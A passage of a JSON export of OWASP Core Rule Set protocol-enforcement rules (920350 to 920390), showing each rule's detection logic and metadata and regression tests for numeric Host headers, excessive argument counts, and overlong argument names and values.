"(?:^([\\d.]+|\\[[\\da-f:]+\\]|[\\da-f:]+)(:[\\d]+)?$)", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Host header is a numeric IP address", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "127.0.0.1", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920350 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920350 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "1.2.3.4", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920350 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 4, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "[::1]", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920350 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 5, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "[fe80::f1:01:fe01:1]", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920350 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 6, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "[fe80::f1:01:fe01:1]:80", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920350 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 7, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "deadbeef.de:8080", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920350 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 8, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "deadbeef.de", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920350 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 712, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Host", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?:^([\\d.]+|\\[[\\da-f:]+\\]|[\\da-f:]+)(:[\\d]+)?$)", "actions": [ { "act_name": "id", "lineno": 713, "act_quote": "no_quote", "act_arg": "920350", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 714, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 715, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 716, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 717, "act_quote": "quotes", "act_arg": "Host header is a numeric IP address", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 718, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 719, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 720, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 721, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 722, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 723, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 724, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 725, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 726, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 727, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 728, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 729, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 712 } }, { "rule_id": "920380", "has_tests": true, "detection": { "variables": [ { "name": "TX", "part": "MAX_NUM_ARGS", "negated": false } ], "operator": { "type": "@eq", "argument": "1", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "Too many arguments in request", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Too many arguments in request (920380) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/?param1=1¶m2=1¶m3=1¶m4=1¶m5=1¶m6=1¶m7=1¶m8=1¶m9=1¶m10=1¶m11=1¶m12=1¶m13=1¶m14=1¶m15=1¶m16=1¶m17=1¶m18=1¶m19=1¶m20=1¶m21=1¶m22=1¶m23=1¶m24=1¶m25=1¶m26=1¶m27=1¶m28=1¶m29=1¶m30=1¶m31=1¶m32=1¶m33=1¶m34=1¶m35=1¶m36=1¶m37=1¶m38=1¶m39=1¶m40=1¶m41=1¶m42=1¶m43=1¶m44=1¶m45=1¶m46=1¶m47=1¶m48=1¶m49=1¶m50=1¶m51=1¶m52=1¶m53=1¶m54=1¶m55=1¶m56=1¶m57=1¶m58=1¶m59=1¶m60=1¶m61=1¶m62=1¶m63=1¶m64=1¶m65=1¶m66=1¶m67=1¶m68=1¶m69=1¶m70=1¶m71=1¶m72=1¶m73=1¶m74=1¶m75=1¶m76=1¶m77=1¶m78=1¶m79=1¶m80=1¶m81=1¶m82=1¶m83=1¶m84=1¶m85=1¶m86=1¶m87=1¶m88=1¶m89=1¶m90=1¶m91=1¶m92=1¶m93=1¶m94=1¶m95=1¶m96=1¶m97=1¶m98=1¶m99=1¶m100=1¶m101=1¶m102=1¶m103=1¶m104=1¶m105=1¶m106=1¶m107=1¶m108=1¶m109=1¶m110=1¶m111=1¶m112=1¶m113=1¶m114=1¶m115=1¶m116=1¶m117=1¶m118=1¶m119=1¶m120=1¶m121=1¶m122=1¶m123=1¶m124=1¶m125=1¶m126=1¶m127=1¶m128=1¶m129=1¶m130=1¶m131=1¶m132=1¶m133=1¶m134=1¶m135=1¶m136=1¶m137=1¶m138=1¶m139=1¶m140=1¶m141=1¶m142=1¶m143=1¶m144=1¶m145=1¶m146=1¶m147=1¶m148=1¶m149=1¶m150=1¶m151=1¶m152=1¶m153=1¶m154=1¶m155=1¶m156=1¶m157=1¶m158=1¶m159=1¶m160=1¶m161=1¶m162=1¶m163=1¶m164=1¶m165=1¶m166=1¶m167=1¶m168=1¶m169=1¶m170=1¶m171=1¶m172=1¶m173=1¶m174=1¶m175=1¶m176=1¶m177=1¶m178=1¶m179=1¶m180=1¶m181=1¶m182=1¶m183=1¶m184=1¶m185=1¶m186=1¶m187=1¶m188=1¶m189=1¶m190=1¶m191=1¶m192=1¶m193=1¶m194=1¶m195=1¶m196=1¶m197=1¶m198=1¶m199=1¶m200=1¶m201=1¶m202=1¶m203=1¶m204=1¶m205=1¶m206=1¶m207=1¶m208=1¶m209=1¶m210=1¶m211=1¶m212=1¶m213=1¶m214=1¶m215=1¶m216=1¶m217=1¶m218=1¶m219=1¶m220=1¶m221=1¶m222=1¶m223=1¶m224=1¶m225=1¶m226=1¶m227=1¶m228=1¶m229=1¶m230=1¶m231=1¶m232=1¶m233=1¶m234=1¶m235=1¶m236=1¶m237=1¶m238=1¶m239=1¶m240=1¶m241=1¶m242=1¶m243=1¶m244=1¶m245=1¶m246=1¶m247=1¶m248=1¶m249=1¶m250=1¶m251=1¶m252=1¶m253=1¶m254=1¶m255=1¶m256=1", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920380 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "param1=1¶m2=1¶m3=1¶m4=1¶m5=1¶m6=1¶m7=1¶m8=1¶m9=1¶m10=1¶m11=1¶m12=1¶m13=1¶m14=1¶m15=1¶m16=1¶m17=1¶m18=1¶m19=1¶m20=1¶m21=1¶m22=1¶m23=1¶m24=1¶m25=1¶m26=1¶m27=1¶m28=1¶m29=1¶m30=1¶m31=1¶m32=1¶m33=1¶m34=1¶m35=1¶m36=1¶m37=1¶m38=1¶m39=1¶m40=1¶m41=1¶m42=1¶m43=1¶m44=1¶m45=1¶m46=1¶m47=1¶m48=1¶m49=1¶m50=1¶m51=1¶m52=1¶m53=1¶m54=1¶m55=1¶m56=1¶m57=1¶m58=1¶m59=1¶m60=1¶m61=1¶m62=1¶m63=1¶m64=1¶m65=1¶m66=1¶m67=1¶m68=1¶m69=1¶m70=1¶m71=1¶m72=1¶m73=1¶m74=1¶m75=1¶m76=1¶m77=1¶m78=1¶m79=1¶m80=1¶m81=1¶m82=1¶m83=1¶m84=1¶m85=1¶m86=1¶m87=1¶m88=1¶m89=1¶m90=1¶m91=1¶m92=1¶m93=1¶m94=1¶m95=1¶m96=1¶m97=1¶m98=1¶m99=1¶m100=1¶m101=1¶m102=1¶m103=1¶m104=1¶m105=1¶m106=1¶m107=1¶m108=1¶m109=1¶m110=1¶m111=1¶m112=1¶m113=1¶m114=1¶m115=1¶m116=1¶m117=1¶m118=1¶m119=1¶m120=1¶m121=1¶m122=1¶m123=1¶m124=1¶m125=1¶m126=1¶m127=1¶m128=1¶m129=1¶m130=1¶m131=1¶m132=1¶m133=1¶m134=1¶m135=1¶m136=1¶m137=1¶m138=1¶m139=1¶m140=1¶m141=1¶m142=1¶m143=1¶m144=1¶m145=1¶m146=1¶m147=1¶m148=1¶m149=1¶m150=1¶m151=1¶m152=1¶m153=1¶m154=1¶m155=1¶m156=1¶m157=1¶m158=1¶m159=1¶m160=1¶m161=1¶m162=1¶m163=1¶m164=1¶m165=1¶m166=1¶m167=1¶m168=1¶m169=1¶m170=1¶m171=1¶m172=1¶m173=1¶m174=1¶m175=1¶m176=1¶m177=1¶m178=1¶m179=1¶m180=1¶m181=1¶m182=1¶m183=1¶m184=1¶m185=1¶m186=1¶m187=1¶m188=1¶m189=1¶m190=1¶m191=1¶m192=1¶m193=1¶m194=1¶m195=1¶m196=1¶m197=1¶m198=1¶m199=1¶m200=1¶m201=1¶m202=1¶m203=1¶m204=1¶m205=1¶m206=1¶m207=1¶m208=1¶m209=1¶m210=1¶m211=1¶m212=1¶m213=1¶m214=1¶m215=1¶m216=1¶m217=1¶m218=1¶m219=1¶m220=1¶m221=1¶m222=1¶m223=1¶m224=1¶m225=1¶m226=1¶m227=1¶m228=1¶m229=1¶m230=1¶m231=1¶m232=1¶m233=1¶m234=1¶m235=1¶m236=1¶m237=1¶m238=1¶m239=1¶m240=1¶m241=1¶m242=1¶m243=1¶m244=1¶m245=1¶m246=1¶m247=1¶m248=1¶m249=1¶m250=1¶m251=1¶m252=1¶m253=1¶m254=1¶m255=1¶m256=1" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 745, "variables": [ { "variable": "TX", "variable_part": "MAX_NUM_ARGS", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 746, "act_quote": "no_quote", "act_arg": "920380", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 747, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 748, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 749, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 750, "act_quote": "quotes", "act_arg": "Too many arguments in request", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 751, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 752, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 753, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 754, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 755, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 756, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 757, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 758, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 759, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 760, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 761, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 762, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 745 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "ARGS", "part": "", "negated": false } ], "operator": { "type": "@gt", "argument": "%{tx.max_num_args}", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 763, "variables": [ { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@gt", "operator_argument": "%{tx.max_num_args}", "actions": [ { "act_name": "t", "lineno": 764, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 765, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 763 } }, { "rule_id": "920360", "has_tests": true, "detection": { "variables": [ { "name": "TX", "part": "ARG_NAME_LENGTH", "negated": false } ], "operator": { "type": "@eq", "argument": "1", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "Argument name too long", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Argument name too long (920360) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920360 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 771, "variables": [ { "variable": "TX", "variable_part": "ARG_NAME_LENGTH", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 772, "act_quote": "no_quote", "act_arg": "920360", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 773, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 774, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 775, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 776, "act_quote": "quotes", "act_arg": "Argument name too long", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 777, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 778, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 779, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 780, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 781, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 782, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 783, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 784, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 785, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 786, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 787, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 788, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 771 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@gt", "argument": "%{tx.arg_name_length}", "negated": false } }, "transformations": [ "none", "length" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 789, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@gt", "operator_argument": "%{tx.arg_name_length}", "actions": [ { "act_name": "t", "lineno": 790, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 790, "act_quote": "no_quote", "act_arg": "length", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 791, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 789 } }, { "rule_id": "920370", "has_tests": true, "detection": { "variables": [ { "name": "TX", "part": "ARG_LENGTH", "negated": false } ], "operator": { "type": "@eq", "argument": "1", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "Argument value too long", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Argument value too long (920370) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920370 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 799, "variables": [ { "variable": "TX", "variable_part": "ARG_LENGTH", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 800, "act_quote": "no_quote", "act_arg": "920370", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 801, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 802, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 803, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 804, "act_quote": "quotes", "act_arg": "Argument value too long", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 805, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 806, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 807, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 808, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 809, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 810, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 811, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 812, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 813, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 814, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 815, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 816, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 799 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "ARGS", "part": "", "negated": false } ], "operator": { "type": "@gt", "argument": "%{tx.arg_length}", "negated": false } }, "transformations": [ "none", "length" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 817, "variables": [ { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@gt", "operator_argument": "%{tx.arg_length}", "actions": [ { "act_name": "t", "lineno": 818, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 818, "act_quote": "no_quote", "act_arg": "length", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 819, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 817 } }, { "rule_id": "920390", "has_tests": true, "detection": { "variables": [ { "name": "TX", "part": "TOTAL_ARG_LENGTH", "negated": false } ], "operator": { "type": "@eq", "argument": "1", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "Total arguments size exceeded", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": 